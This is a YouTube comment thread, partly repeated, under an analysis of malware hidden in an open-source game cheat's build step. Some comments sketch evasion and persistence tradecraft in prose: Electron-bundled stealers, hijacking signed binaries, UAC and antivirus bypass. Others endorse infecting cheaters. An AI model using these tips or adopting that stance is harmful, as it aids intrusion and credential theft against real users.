"most cheats are written in something low level so they can access memory" ... electron app. He really thought this one might be a little smarter than the usual crap hey
To be fair, electron is probably the most reliable way to stay undetected for a long time. I have samples that have been out there in the wild for a few months now and they are still mostly undetected. A simple hello world in C with the wrong import will get you more detections on vt than a full blown infostealer bundled as electron app. Bonus points if you steal the main executable from a legitimate app, cuz now you have a signed, very popular, universally trusted binary doing all the dirty work.
i mean he's kinda smart. Even though this kind of attack is designed for windows machines, but electron apps are cross platform and he can make it work on linux or macOS whenever he wants (not saying that it would be easier to do something like this)
When a Papa malware drops a load onto a motherboard and you confuse the size of his tool for a child's leg. (Bro you should become an archeologist then you can confuse dinosaur poop with dinosaurs because who cares its all a bunch of dead crap anyway not like it predicts where large sums of gold deposits are located within the earth. lolololol)
Imagine being a kid and your first foire into programming is cloning a cheat, installing visual studio, and then getting your computer infected. Hope they learned something from that EDIT: I also dabbled into Call of Duty 2 cheats when I was a kid. Kids are stupid okay we were all there once.
@@BorderKeeper I remember installing CS 1.6 hacks and they did work I used to destroy servers but my PC was sooooooo slow I'm pretty sure they were mining crypto on my moms laptop lol
@@cornelius2993 Not really. That'd be similar to saying that a bank robber got hit by a car when he was fleeing, and the car drove away. So now it's a hit and run victim, not a bank robber ?
This might seem like a stupid question but how do people deal with info stealers? Seems like a game over kind of thing. You just lose all your accounts? Is it only if you sign into something after installing the stealer? So you don't lose everything but it's still an awful thing to go through. Seems like a nightmare.
It’s actually a good question I will address in an upcoming video. It’s any password or cookie saved on the affected system. Most stealers are not persistent but some are. Basic recovery guide is change every password, and any app that gives you the option to terminate all sessions do it.
@@EricParker if you're logged in to your email on your browser but you haven't saved your password in the browser can an info stealer gain access to your email?
*Looks up a cheat for an online game* *Is fully aware that cheating in said online game ruins the fun for legit player* *Complains that said cheat contains maleware* *Lack of selfawareness intensifies* Cheaters are so pathetic.
@@Silentlib They simply asked for that. I am really angry that after Eric's video he removed his github. There should be more "open-source" cheats that doing that shit.
@@InfinityForumTV no no i just told you what they asked for i think cheating in tarkov is scummy but not scummy enough to lose thousands of dollars i think its a moral difference ig
I agree with your statement about UAC bypass, if we're speaking of a general target. However we're speaking of people that are knowledgeable enough to download and compile some chest here, so I think a UAC bypass might be worth it here. Particularly if the payload triggers (and thus needs to get through UAC) during build.
99% of cheats are, or include malware... Unless you can decompile or otherwise analyse the code yourself its a fools errand.. unless using disposable or containerised machines.
Do you mean because of the mechanism / techniques they use or why? Sure thing a cheat provider will provide you a loader, not the cheat. the cheat gets then loaded from a server like a payload. This doesnt mean directly that a person like x22 or someone will inject a virus into ur pc - yes they could but they are making more money off ppl buying their cheat.
@@PolumbiusTheThird they will most likely trigger antiviruses anyway due to their nature rpm and wpm will most likely do it, same with anything to do with system
You say that open source cheats are bad cause the anti cheat will detect them however EAC on Linux for example runs on usermode and so any cheat that doesnt write to memory, with 2-3 precaution steps like running the cheat at root level and hiding root pids, will make it undetectable.
Its not that it can't detect, its that the code is open, so if a dev finds the repo then they can try to patch it out, cause again, they know exactly what its doing
You can trick user into disabling everything if they stupid enough to run this kind of code (including anticheat and the game) on their main system where everything can be snatched. Everything that "requires" root and is not controlled by you automatically goes into VM territory.
most ACs utilize memory pattern checks and foreign memory detection to get around most of this, yes if you theoretically had a permission level above that of the AC and only do reads from the memory, this would be clientside undetectable. but the problem comes when you realize many fundemental cheat functions rely on writing to memory, once you write to the game's memory it doesn't matter what permission you're at, the game's client can see what lies in its own memory space and this is where most cheats get dumped, analysed and detected. so to get around this you'd basically have a third program giving fake mouse/keyboard inputs based off of what it knows about the game instance, you'd also have to make sure that this all seems natural and fine on the serverside heurstics as well, which is a whole nother ballgame in its own right. then that's typically where you'll begin to notice that, if the AC developer is actually devoted, it's really not a trivial task at all to make an undetectable cheat simply by being a privilege level above it.
> its 2024 Exactly why. Most of people don't know how to search for information and just give up. They could program it in powershell, but that would be easier for dummies to deal with.
I feel like this was sloppy coding on the malicious person, no thorough obfuscation , was clearly an attempt on the less tech savvy. But I’m glad you presented this, hopefully people who are inclined to cheat will not take the risk and actually think about how they are compromising there systems. 10/10.
NGL, that moment when you opened the webpage and it was node, I was like, yep, toddler level. Compile exe to run CMD to disable powershell policies to bypass prompts and UAC. Then use CMD to obfuscate and add persistence via registry Autostart, task scheduler, add script support, disable other viruses and antiviruses. (since basically CMD is the weakest link on most systems, outside of the users themselves) Actually take over most parts of the system without the user noticing. Only then will the actual payload be delivered. (You didn't touch on this in the video though). I'd love to see you go through the entire payload step by step, de-obfuscating and teaching the young-ins how to be resourceful. It'd also be pretty educational to include the names and links to any and all tools used, and sources of info.
so what does this malware actually do when its ran? does it log and store passwords or does it use your computer as a miner. im sure you mentioned it in the video somewhere but im not big on coding jargon so i didnt really pick up what it does
What I don't understand. Why is it even possible to disable Windows Defender in the registry? The same goes for the security settings. This should all be encrypted. For example, you can use the WindowsKey to decrypt/encrypt, it is unique and it is already encrypted. Or am I thinking wrong?
This looks like it is impersonating some processes like search filter. Is there an easy way to detect those? For example if the process is causing an unusually high cpu load, is it possible to check if the underlying exe is real?
He just checked it here run it in a sandbox and see what it does in a process monitor. Unusually high cpu load actually will not be very common because it is just sending short commands but you may be able to see it doing the commands via task manager or more likely process monitor. You can also run strings on the exe in a sandbox, a lot of the time it will show the cmds or some important strings like a dropper domain name
11:55 I don't agree UAC bypass is worse option here. This thing is supposed to trick developers, who has visual studio or msbuild and has some understanding how things work. I am developer, and i never run things as admin unless it is necessary. Random UAC prompt will put my brain into alert mode, and I will definitely check what's going on. Even when UAC prompt is expected I always check for digital signature of executable at least.
Lol I've been a programmer for a couple decades and I've seen a lot of things hidden in source as resources, active controls, libraries, etc. just because you can read the code doesn't mean people do
How do you protect yourself in a general sense? I know in theory I could do what you did in the video, but that is quite in depth to do every time for new software and someone without cyber security knowledge.
"oh yeah, open source is really secure, because you can read the code" >Doesn't read the code >Or reads the code, and ignores a bunch of weird looking strings in the code >Gets hacked >**Surprised Pikachu face**
you're not going to be reading the project file code, you usually read the ACTUAL source code, the malware here was hiding in the Prebuildevent in the project file. Nobody looks at that, except people who knew about this little loophole with visual studio, and knew that malware can hide there
@@Luzum you should be reading everything, basically. Project file, make file, test cases(this is how the sz utils got hacked, through test cases hooking into compiling) If it was committed, you should be reading it... SPECIALLY if it runs with elevated privileges
Sometime I wonder if blocking pastebin in the dns resolver or hosts file can mess with those kind of script, since a lot of them use that ... yes you can't use pastebin anymore but it's the lesser evil here ... Also, virus total is clearly not usefull for years now, that's a shame ...
...they don't even need to use pastebin, they can use blogger or any free blog host and put the command somewhere in a post. You'd be on a fools errand trying to block everything.
I mean yes, check it, but lots of non malicious open source upload the build to make it easier to build and keep it in sync with the rest of the project.
do you have any videos on how to remove any potential malware on your pc outside of using basic things like windows defender or malware bytes to ensure my pc is clean?
I keep seeing you in my recommended and its so weird. I both have intresets in computers and in roblox, and you happened to make videos on both. Kinda strange how I found you and watched you in totally different ways.
is the hack dev the villain or the hero? cause cheats kill countless of great games, for example, the cycle frontier was an awesome persistent world free to play looter shooter like tarkov which was killed by cheaters. id say screwing up cheaters is alright in my book
I wonder why can't antivirus software have generic detection what would throw warning if it sees base64 encoded vbs file or a ton of empty spaces between line of code? I mean these things repeat from malware to malware so it would be easy to show dialog that shows suspicious parts one by one and at the end let user to decide.
Hiding in the build script reminds me of the XZ backdoor where the malicious component was hidden in the tests and injected the backdoor into the binary after compiling, during testing
11:56 so true, that prompt pops up on EVERYTHING, so Windows useres have been descensitized to it, because Windows' permissions structure is awfull. You can't get any apps to install without admin. I think there's a UAC bypass, because the victim isn't running the program, they are only compiling it, so a random UAC prompt would be weird. Also, you have to compile it yourself, so I guess the malware is designed for people with a bit more knowledge. Ultimately, cheats are designed for bad actors, so there's going to be more mallware around cheats.
WAIT WAIT SO IF EXPLOITERS GET HACKED THAT MEANS LESS HACKERS LESS HACKERS = MORE GOOD PLAYERS GOOD PLAYERS = WINNING MORE MONEY CUZ NO HACKERS WINNING MORE MONEY CUZ NO HACKERS = GET RICH FAST ASF
Hello, in copule of last weeks there was some controversies with Roblox Account Manager that is open source. After recent update anti viruses started detecting it as virus. Devs are saying thats a false positive. Any chance you can check it out?
Have thought about making a video but I have a hard time recommending anything. I briefly experimented with Bitdefender on my windows partition and quite liked it, but it doesn't mix well with the debugging / reversing tools I use. Might be worth testing a few from my usual sources (TH-cam & github), most testers just use samples from sample sites, but the problem with that is it's obviously going to be detected. It's more interesting to see heuristic detections, but none of them do it very well. I have thought about trying to make an anti infostealer utility myself.
I have nearly 2,000 hours and escaped from tarkov, quite frankly, I don't really care about cheaters most the time. You can't tell how you died. Anyways, I think in the time I've been playing I have seen one blatantly obvious cheater. But anyways, that being said, I actually support people releasing hacks with this in them. Hackers are lame
very interesting find! I haven't heard of any big problems with windows defender when it was about cheats but avira, mcaffee or especially avast etc. liked to delete some of the DLLs or even cause bluescreens because of device drivers somehow clashing with the cheat's usually for sources for cheats you don't go there but to forums I'd say. also the name of that project is not something you'd usually see, who lists the features in the name xD? btw for internals i see mostly cpp but for externals i also saw a good share of C# if you paste you should still know what you're pasting and either way cheaters deserve it
@@mtk3078 a bulk of cheat related stuff is malicious because most people downloading cheats are simple and prety easy to trick so it’s just easy targets for malware. Easiest solution is grow up and stop cheating in video games.
All in all good video. I only have critique on the window sizes and the constant scrolling. Also, you did not show what the malware does in a sandbox...
Haha, hacking cheaters under the premise of providing them with free and open source cheats! Great bait. One group of people I couldn't care less about, too. Honestly, this might be an effective strategy to combat cheaters. Just flood the market with malware cheats. If there are more traps than food the dogs will eventually go somewhere else.
Needs to send Malwarebytes a report for account reporting so they can update the system Malwarebytes has to be customly configured there is roughly about 70 to 100 settings depending on the version of a PowerPoints The Standard Version when it comes with 30 settings instructors Cardinal protectors got to configure it right and he could have had a fake Malwarebytes too
> Open source
> Look inside
> Electron slop
Yes it's toddler malware.
"most cheats are written in something low level so they can access memory" ... electron app. He really thought this one might be a little smarter than the usual crap hey
To be fair, electron is probably the most reliable way to stay undetected for a long time. I have samples that have been out there in the wild for a few months now and they are still mostly undetected. A simple hello world in C with the wrong import will get you more detections on vt than a full blown infostealer bundled as electron app. Bonus points if you steal the main executable from a legitimate app, cuz now you have a signed, very popular, universally trusted binary doing all the dirty work.
i mean he's kinda smart. Even though this kind of attack is designed for windows machines, but electron apps are cross platform and he can make it work on linux or macOS whenever he wants (not saying that it would be easier to do something like this)
When a Papa malware drops a load onto a motherboard and you confuse the size of his tool for a child's leg. (Bro you should become an archeologist then you can confuse dinosaur poop with dinosaurs because who cares its all a bunch of dead crap anyway not like it predicts where large sums of gold deposits are located within the earth. lolololol)
@@DudeSoWindude what
0:37 not only are they reading the comments, but they probably are the comments pointing people to their malicious cheats
Or... It's the guy on TH-cam writing the comment about them making the comments 🤨
@@austinbaccus it could be you! it could be me! it could even b-
Sus
the commit names are so professional, good work from their side completely legit
The malware is pretty classic, however hiding it during compile time is really clever
Imagine being a kid and your first foire into programming is cloning a cheat, installing visual studio, and then getting your computer infected. Hope they learned something from that
EDIT: I also dabbled into Call of Duty 2 cheats when I was a kid. Kids are stupid okay we were all there once.
@@BorderKeeper I remember installing CS 1.6 hacks and they did work I used to destroy servers but my PC was sooooooo slow
I'm pretty sure they were mining crypto on my moms laptop lol
@@BorderKeeper tbh thats how u learn sometimes.
@@BorderKeeper i never cheated in any game as a kid, you were just a rat lmao
The victim? That's karma for cheating in a game.
That's what I was thinking, kinda bothered me that he called the cheater a victim.
So karma only works on you when you download it for free instead of paying for it from regit seller?
@Rookinton from a "technical" perspective it's called a victim. The ethics regarding cheating are not the focus of this video.
@@cornelius2993 Not really. That'd be similar to saying that a bank robber got hit by a car when he was fleeing, and the car drove away. So now it's a hit and run victim, not a bank robber ?
@@Rookintonso I think that means he's both a robber and a hit and run victim
idk anything about cheating or coding, but your videos are very good with good info on these rats and hidden malwares! its enjoyable to watch. thanks
Big wall of base64, ah yes perfectly legit hacks..
"open source" but when you open the source its a grand canyon of base64 hidden payloads
This might seem like a stupid question but how do people deal with info stealers? Seems like a game over kind of thing. You just lose all your accounts? Is it only if you sign into something after installing the stealer? So you don't lose everything but it's still an awful thing to go through. Seems like a nightmare.
It’s actually a good question I will address in an upcoming video. It’s any password or cookie saved on the affected system. Most stealers are not persistent but some are.
Basic recovery guide is change every password, and any app that gives you the option to terminate all sessions do it.
If you have hardware based 2FA like FIDO2, even if your password gets stolen, bad actors cannot access your account
Never save passwords
U disconnect from Wi-Fi on your infected device and change ur passwords from another device
@@EricParker if you're logged in to your email on your browser but you haven't saved your password in the browser can an info stealer gain access to your email?
No, source code is not enough, it needs to be reviewed. If it's open, not used, and you can't review, then you just as effed as if it's closed source.
*Looks up a cheat for an online game*
*Is fully aware that cheating in said online game ruins the fun for legit player*
*Complains that said cheat contains maleware*
*Lack of selfawareness intensifies*
Cheaters are so pathetic.
their suffering is now our content, lol
There’s a huge difference between cheating in a game and stealing someone’s information 🤨
@@knight808.
Sorry but no compassion from me if you cheat in multiplayer games.
Nah, the cheaters are taking my free time, so there should be taken something from them aswell, an eye for an eye@knight808.
@@knight808. it's endless fun to watch a cheater cry ^^
the cat ears remember
almost 2/3 there. I'm guessing early Sept.
More concrete planning for the stream around 85k.
I don't think so tim
subbed
I dont think. He promised ONLY the cat ears@@U8A
ew
It running at compile time is clever.
It's not running at compile time though. It's a prebuild step, so before any compilation actually happens.
@@doanamo 🤓
@@doanamoAcTuAlLy.
The point is the same... runs when you build.
@@doanamo so Gentoo is still a safe distro? ;-)
Maybe just don't cheat
@zypher-x3d no skill
In a perfect world, but we all know you'd cheat on something, too, if you felt you could benefit. 🤷
@zypher-x3d holy slop channel, Batman. If you're gonna cheat (and upload it to TH-cam no less) at least make it interesting.
@zypher-x3d someone's clearly never gotten his block knocked off before
@zypher-x3d HAHAHAAHAHAHAHAAHAAHAHAHAHAAHAHAHAH
i find it REALLY hard to feel bad for people cheating in competitive online games lol
Well think about it this way they cheat knowing they will get banned not get their expensive computer or credit card info used and ratted
@@Silentlib They simply asked for that. I am really angry that after Eric's video he removed his github. There should be more "open-source" cheats that doing that shit.
@@InfinityForumTV no no i just told you what they asked for i think cheating in tarkov is scummy but not scummy enough to lose thousands of dollars i think its a moral difference ig
@SilentRtserpentslyfe if you don't want your computer messed with don't install shady stuff like cheats lol
@@sacman4611 i guess
I agree with your statement about UAC bypass, if we're speaking of a general target.
However we're speaking of people that are knowledgeable enough to download and compile some chest here, so I think a UAC bypass might be worth it here. Particularly if the payload triggers (and thus needs to get through UAC) during build.
99% of cheats are, or include malware...
Unless you can decompile or otherwise analyse the code yourself its a fools errand.. unless using disposable or containerised machines.
where did you get the 99% figure from?
bro decompiled and analised 100% of them
Do you mean because of the mechanism / techniques they use or why?
Sure thing a cheat provider will provide you a loader, not the cheat. the cheat gets then loaded from a server like a payload.
This doesnt mean directly that a person like x22 or someone will inject a virus into ur pc - yes they could but they are making more money off ppl buying their cheat.
most hacks are safe. if they dont include a virus scan dont dl.
@@PolumbiusTheThird they will most likely trigger antiviruses anyway due to their nature rpm and wpm will most likely do it, same with anything to do with system
You say that open source cheats are bad cause the anti cheat will detect them however EAC on Linux for example runs on usermode and so any cheat that doesnt write to memory, with 2-3 precaution steps like running the cheat at root level and hiding root pids, will make it undetectable.
Its not that it can't detect, its that the code is open, so if a dev finds the repo then they can try to patch it out, cause again, they know exactly what its doing
You can trick user into disabling everything if they stupid enough to run this kind of code (including anticheat and the game) on their main system where everything can be snatched. Everything that "requires" root and is not controlled by you automatically goes into VM territory.
most ACs utilize memory pattern checks and foreign memory detection to get around most of this, yes if you theoretically had a permission level above that of the AC and only do reads from the memory, this would be clientside undetectable.
but the problem comes when you realize many fundemental cheat functions rely on writing to memory, once you write to the game's memory it doesn't matter what permission you're at, the game's client can see what lies in its own memory space and this is where most cheats get dumped, analysed and detected.
so to get around this you'd basically have a third program giving fake mouse/keyboard inputs based off of what it knows about the game instance, you'd also have to make sure that this all seems natural and fine on the serverside heurstics as well, which is a whole nother ballgame in its own right.
then that's typically where you'll begin to notice that, if the AC developer is actually devoted, it's really not a trivial task at all to make an undetectable cheat simply by being a privilege level above it.
That exe file is likely harmless. The real deal in electron malware usually lies in resource/app.asar, except for the 3CX one done by the DPRK.
Rly? VBS malware? Guys, it's 2024!
we digging up the 1990s gems with this one
It's windows time. The bsod Crowdstrike event was only Crowdstrike fault yeah
reject modernity, return to vbs
> its 2024
Exactly why. Most of people don't know how to search for information and just give up. They could program it in powershell, but that would be easier for dummies to deal with.
its always been used due to its ease of use for the purpose
Cheaters should get hacked though
I feel like this was sloppy coding on the malicious person, no thorough obfuscation , was clearly an attempt on the less tech savvy. But I’m glad you presented this, hopefully people who are inclined to cheat will not take the risk and actually think about how they are compromising there systems. 10/10.
this malware is doing gods work putting cheaters in their place
Maybe edit your title and include “Tarkov” anywhere
I would bet, it will boost your views pretty much
Btw, thx for this video!
NGL, that moment when you opened the webpage and it was node, I was like, yep, toddler level.
Compile exe to run CMD to disable powershell policies to bypass prompts and UAC.
Then use CMD to obfuscate and add persistence via registry Autostart, task scheduler, add script support, disable other viruses and antiviruses.
(since basically CMD is the weakest link on most systems, outside of the users themselves)
Actually take over most parts of the system without the user noticing.
Only then will the actual payload be delivered.
(You didn't touch on this in the video though).
I'd love to see you go through the entire payload step by step, de-obfuscating and teaching the young-ins how to be resourceful.
It'd also be pretty educational to include the names and links to any and all tools used, and sources of info.
so what does this malware actually do when its ran? does it log and store passwords or does it use your computer as a miner. im sure you mentioned it in the video somewhere but im not big on coding jargon so i didnt really pick up what it does
1:57 what AI is that? I never knew it was good at detecting malware, especially identifying it
Ah, it's Claude. I'd never heard of it before!
WOAH just found your channel yesterday lol and you just uploaded!
what programs are you using for forenzics here?
Sandboxes and manual analysis (reading and re-writing the scripts manually with some AI assitance). Any.run is the main one.
Thanks bud @@EricParker
What I don't understand. Why is it even possible to disable Windows Defender in the registry? The same goes for the security settings.
This should all be encrypted. For example, you can use the WindowsKey to decrypt/encrypt, it is unique and it is already encrypted.
Or am I thinking wrong?
This looks like it is impersonating some processes like search filter. Is there an easy way to detect those? For example if the process is causing an unusually high cpu load, is it possible to check if the underlying exe is real?
He just checked it here run it in a sandbox and see what it does in a process monitor. Unusually high cpu load actually will not be very common because it is just sending short commands but you may be able to see it doing the commands via task manager or more likely process monitor.
You can also run strings on the exe in a sandbox, a lot of the time it will show the cmds or some important strings like a dropper domain name
Process Explorer can show you a bit of info. It can even get a virustotal report on them
i love how your videos always leave me smarter than before!
11:55 I don't agree UAC bypass is worse option here. This thing is supposed to trick developers, who has visual studio or msbuild and has some understanding how things work.
I am developer, and i never run things as admin unless it is necessary. Random UAC prompt will put my brain into alert mode, and I will definitely check what's going on.
Even when UAC prompt is expected I always check for digital signature of executable at least.
Great, but you forget that you are not tricking developers, you are tricking 13 year old kids who want to cheat in Tarkov.
@@grayman2749 13 yo is going to download compiled version, 13 yo don't understand why they should build software by themselves
Lol I've been a programmer for a couple decades and I've seen a lot of things hidden in source as resources, active controls, libraries, etc. just because you can read the code doesn't mean people do
Tristan tate teaching me about dangerous open source
Awesome content!! Super newby here but throughly interested and pleased in your content sir!!
why do all of them use base64 encoding? You might as well have it be plain at that point
How do you protect yourself in a general sense? I know in theory I could do what you did in the video, but that is quite in depth to do every time for new software and someone without cyber security knowledge.
@@dfcw easy way to protect your self from malware in cheats is to get a life and stop downloading cheats….
"oh yeah, open source is really secure, because you can read the code"
>Doesn't read the code
>Or reads the code, and ignores a bunch of weird looking strings in the code
>Gets hacked
>**Surprised Pikachu face**
you're not going to be reading the project file code, you usually read the ACTUAL source code, the malware here was hiding in the Prebuildevent in the project file. Nobody looks at that, except people who knew about this little loophole with visual studio, and knew that malware can hide there
@@Luzum you should be reading everything, basically. Project file, make file, test cases(this is how the sz utils got hacked, through test cases hooking into compiling)
If it was committed, you should be reading it... SPECIALLY if it runs with elevated privileges
Sometime I wonder if blocking pastebin in the dns resolver or hosts file can mess with those kind of script, since a lot of them use that ... yes you can't use pastebin anymore but it's the lesser evil here ... Also, virus total is clearly not usefull for years now, that's a shame ...
...they don't even need to use pastebin, they can use blogger or any free blog host and put the command somewhere in a post. You'd be on a fools errand trying to block everything.
This is how the XZ incident happened. If one include the build in repository, you should doubt it..
I mean yes, check it, but lots of non malicious open source upload the build to make it easier to build and keep it in sync with the rest of the project.
do you have any videos on how to remove any potential malware on your pc outside of using basic things like windows defender or malware bytes to ensure my pc is clean?
I keep seeing you in my recommended and its so weird. I both have intresets in computers and in roblox, and you happened to make videos on both. Kinda strange how I found you and watched you in totally different ways.
oh this kind of stuff is everywhere in the cheat space, you guys have got to be careful now
@@elektrokinesis4150 good hope malware continues to be put in more cheats
Is Detect It Easy safe? The software for the VM it's still Detect It Easy right?Thanks in advance for the help
whats the point of Base64? Why dont they obfuscate the code?
I'm glad I found your channel. It is super interesting!
Why the anti analysis system is trying to get rid of imsonia that is a api tester??
is the hack dev the villain or the hero? cause cheats kill countless of great games, for example, the cycle frontier was an awesome persistent world free to play looter shooter like tarkov which was killed by cheaters. id say screwing up cheaters is alright in my book
"ctrl + /" to comment a line in the file extension's appropriate syntax in visual studio code
I wonder why can't antivirus software have generic detection what would throw warning if it sees base64 encoded vbs file or a ton of empty spaces between line of code? I mean these things repeat from malware to malware so it would be easy to show dialog that shows suspicious parts one by one and at the end let user to decide.
what is that ai you are using at 1:57?
He says it right before he shows it, it’s Claude
Hiding in the build script reminds me of the XZ backdoor where the malicious component was hidden in the tests and injected the backdoor into the binary after compiling, during testing
11:56 so true, that prompt pops up on EVERYTHING, so Windows useres have been descensitized to it, because Windows' permissions structure is awfull. You can't get any apps to install without admin. I think there's a UAC bypass, because the victim isn't running the program, they are only compiling it, so a random UAC prompt would be weird. Also, you have to compile it yourself, so I guess the malware is designed for people with a bit more knowledge.
Ultimately, cheats are designed for bad actors, so there's going to be more mallware around cheats.
WAIT WAIT
SO IF EXPLOITERS GET HACKED THAT MEANS LESS HACKERS
LESS HACKERS = MORE GOOD PLAYERS
GOOD PLAYERS = WINNING MORE MONEY CUZ NO HACKERS
WINNING MORE MONEY CUZ NO HACKERS = GET RICH FAST ASF
love this. we need more cheats like this.
Based. Cheaters never win.
Someone doing gods work with this malware in cheats
More malware analysis pleaseee
Oh man now i'm going to have to do all builds in a vm. just when i started to get comfy. Thanks.
Hello, in copule of last weeks there was some controversies with Roblox Account Manager that is open source. After recent update anti viruses started detecting it as virus. Devs are saying thats a false positive. Any chance you can check it out?
With so many stages and processes, hopefully it would probably trigger an EDR
Very few gamers will be using EDR solutions on their gaming systems, though...
Jia Tan strikes again
you a dork for letting cheaters know about malicious cheats. they deserve it.
What hypervisor are you using?
and this is why id look at the code (yes including build scripts) and build from source if im doing anything from something i dont trust
11:30 Sonic.exe was chasing me until I took that specific advice to get rid of him
Thanks Eric!
I saw a lot of repos like this they all have that long repository name and tags, and colorful readme
what windows anti virus would you recommend?
Linux.
@@shabath are you insane?
windows defender is fine, you have to be an advanced idiot to mess up 🙏
A hammer
Have thought about making a video but I have a hard time recommending anything. I briefly experimented with Bitdefender on my windows partition and quite liked it, but it doesn't mix well with the debugging / reversing tools I use.
Might be worth testing a few from my usual sources (TH-cam & github), most testers just use samples from sample sites, but the problem with that is it's obviously going to be detected. It's more interesting to see heuristic detections, but none of them do it very well. I have thought about trying to make an anti infostealer utility myself.
Should i reset my compuet fully, or is malwarebytes full scan enough with rootkids ?
Generally depends how old the malware is. Fresh samples are usually undetected for a while.
Easy fix dont be a pos and download cheats. Wish every cheat had malware and would steal every cheaters identity.
Me too, if I get to the point in life where I have money to blow I might start commissioning this type of work to be done
How about I should be allowed to cheat in my singleplayer game?
@@KatherineFtw They likely mean cheats for multiplayer games. Almost no one cares if you cheat in a singleplayer game
0:50 This is not true at all; there are many games where the developers don't care or take a very long time.
Am i able to submit you malware that you could check?
thats why u check the star count
anything below 30 is unsafe and even if it is above 30 I check if its from a known dev
@@1Pxul easiest way to stay safe is not be a weirdo that download cheats because they have some sort of ego problem….
@@mr.frogster4398 cope harder bro
why not dump the electron source code (asar)
just seems like karma to me
Don't help these savages ...
This happened to my buddy Eric once
My first thought was: but why edge browser ?
Probably because it's a VM and he did not bother to install a different browser
@@jean-mauricenestler3761 True but even visually seeing edge makes me nauseous :))
honestly with tarkovs cheating issue this is great
I have nearly 2,000 hours and escaped from tarkov, quite frankly, I don't really care about cheaters most the time. You can't tell how you died. Anyways, I think in the time I've been playing I have seen one blatantly obvious cheater. But anyways, that being said, I actually support people releasing hacks with this in them. Hackers are lame
this was interesting, good video!
"Made the cheat with genuine intentions"
LMAOOOOO
0:56 that's not true lmao. for years the best cheat for tf2 was open source
Also instead of Claude see if you can run dolphin llama. It won’t bug you about ethics
very interesting find!
I haven't heard of any big problems with windows defender when it was about cheats but avira, mcaffee or especially avast etc. liked to delete some of the DLLs or even cause bluescreens because of device drivers somehow clashing with the cheat's
usually for sources for cheats you don't go there but to forums I'd say. also the name of that project is not something you'd usually see, who lists the features in the name xD?
btw for internals i see mostly cpp but for externals i also saw a good share of C#
if you paste you should still know what you're pasting and either way cheaters deserve it
Anticheat developers and malware cheat developers have strangely aligned interests.😂
can you share the files? because the original github repository is deleted lol im pretty sure the guy saw this video so he remove it lol
Get what you deserve for cheating.
The uac bypass was used because it sets its self to startup
3:56
"Do you trust the authors?"
> Yes, I trust the authors ✅👍😁🙌
💀
Gotta be the best youtuber
Without watching this video, i guess its Base64 code hidden in the source? I will watch the video now and see if my wild guess was correct
Can you make a video about Hardware ID spoofers they seem malicious
I do want to make a more general one on the bootkits behind such things. They are not always malicious but they make your sytsem ultra insecure.
@@mtk3078 a bulk of cheat related stuff is malicious because most people downloading cheats are simple and prety easy to trick so it’s just easy targets for malware. Easiest solution is grow up and stop cheating in video games.
I hope more people design cheats with malware included 🤗
All in all good video. I only have critique on the window sizes and the constant scrolling. Also, you did not show what the malware does in a sandbox...
I use temple os btw.
Haha, hacking cheaters under the premise of providing them with free and open source cheats! Great bait. One group of people I couldn't care less about, too. Honestly, this might be an effective strategy to combat cheaters. Just flood the market with malware cheats. If there are more traps than food the dogs will eventually go somewhere else.
Needs to send Malwarebytes a report for account reporting so they can update the system Malwarebytes has to be customly configured there is roughly about 70 to 100 settings depending on the version of a PowerPoints The Standard Version when it comes with 30 settings instructors Cardinal protectors got to configure it right and he could have had a fake Malwarebytes too
Guys worried about malware while he's running Microsofts AI "Copilot" malware.
Reproducable - if not - best to build frim source - not knowing if binaries correspond to source